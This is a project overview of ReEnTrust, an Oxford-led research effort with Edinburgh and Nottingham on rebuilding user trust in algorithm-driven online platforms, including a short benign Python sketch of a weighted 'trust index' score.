Introducing: ReEnTrust

As interaction on Web-based platforms becomes an essential part of people’s everyday lives and data-driven AI algorithms start to exert a massive influence on society, we are experiencing significant tensions in user perspectives regarding how these algorithms are used on the Web. These tensions result in a breakdown of trust: users do not know when to trust the outcomes of algorithmic processes and, consequently, the platforms that use them. Because trust is a key component of the Digital Economy, in which algorithmic decisions affect citizens’ everyday lives, this is a significant issue that needs to be addressed.

ReEnTrust explores new technological opportunities for platforms to regain user trust and aims to identify how this may be achieved in ways that are user-driven and responsible. Focusing on AI algorithms and large-scale platforms used by the general public, our research questions include: What are user expectations and requirements regarding the (re)building of trust in algorithmic systems? Is it possible to create technological solutions that (re)build trust by embedding values in recommendation, prediction, and information filtering algorithms and allowing for a productive debate on algorithm design between all stakeholders? To what extent can user trust be (re)gained through technological solutions, and what further trust (re)building mechanisms might be necessary and appropriate, including policy, regulation, and education?

The project will develop an experimental online tool that allows users to evaluate and critique algorithms used by online platforms, and to engage in dialogue and collective reflection with all relevant stakeholders in order to jointly recover from algorithmic behaviour that has caused a loss of trust. For this purpose, we will develop novel, advanced AI-driven mediation support techniques that allow all parties to explain their views and suggest possible compromise solutions. Extensive engagement with users, stakeholders, and platform service providers in the process of developing this online tool will result in an improved understanding of what makes AI algorithms trustable. We will also develop policy recommendations, requirements for technological solutions, assessment criteria for the inclusion of trust relationships in the development of algorithmically mediated systems, and a methodology for deriving a “trust index” for online platforms that allows users to easily assess the trustability of platforms.
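To give a purely illustrative sense of what such a trust index might involve, the sketch below aggregates a handful of hypothetical trust-related signals into a single weighted score. The signal names, weights, and 0–1 scoring scale are assumptions made for illustration only; the actual methodology will be an outcome of the project's research with users and stakeholders.

```python
# Illustrative sketch only: a "trust index" as a weighted aggregation of
# hypothetical trust-related signals for an online platform. The signals,
# weights, and scoring scale are assumptions, not the project's methodology.

from dataclasses import dataclass


@dataclass
class TrustSignals:
    """Hypothetical per-platform signals, each scored in the range [0, 1]."""
    transparency: float       # how well the platform explains its algorithms
    user_satisfaction: float  # aggregate user ratings of algorithmic outcomes
    redress: float            # availability of appeal / correction mechanisms
    value_alignment: float    # agreement between embedded and stated values


# Example weights; in practice these would be derived from user studies.
WEIGHTS = {
    "transparency": 0.3,
    "user_satisfaction": 0.3,
    "redress": 0.2,
    "value_alignment": 0.2,
}


def trust_index(signals: TrustSignals) -> float:
    """Combine the signals into a single score between 0 and 1."""
    return sum(getattr(signals, name) * weight for name, weight in WEIGHTS.items())


if __name__ == "__main__":
    platform = TrustSignals(transparency=0.6, user_satisfaction=0.8,
                            redress=0.4, value_alignment=0.7)
    print(f"Trust index: {trust_index(platform):.2f}")  # Trust index: 0.64
```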

The project is led by the University of Oxford in collaboration with the Universities of Edinburgh and Nottingham. Edinburgh is developing novel computational techniques to evaluate and critique the values embedded in algorithms, together with a prototypical AI-supported platform that enables users to exchange opinions regarding algorithm failures and to jointly agree on how to “fix” the algorithms in question in order to rebuild trust. The Oxford and Nottingham teams are developing methodologies that support the user-centred and responsible development of these tools. This involves studying the processes of trust breakdown and rebuilding in online platforms, and developing a Responsible Research and Innovation approach to understanding trustability and trust rebuilding in practice. A carefully selected set of industrial and other non-academic partners ensures that ReEnTrust’s work is grounded in real-world examples and experiences, and that it embeds a balanced, fair representation of all stakeholder groups.

ReEnTrust will advance the state of the art in trust rebuilding technologies for algorithm-driven online platforms by developing the first AI-supported mediation and conflict resolution techniques, together with a comprehensive user-centred design and Responsible Research and Innovation framework that promotes a shared-responsibility approach to the use of algorithms in society, thereby contributing to a flourishing Digital Economy.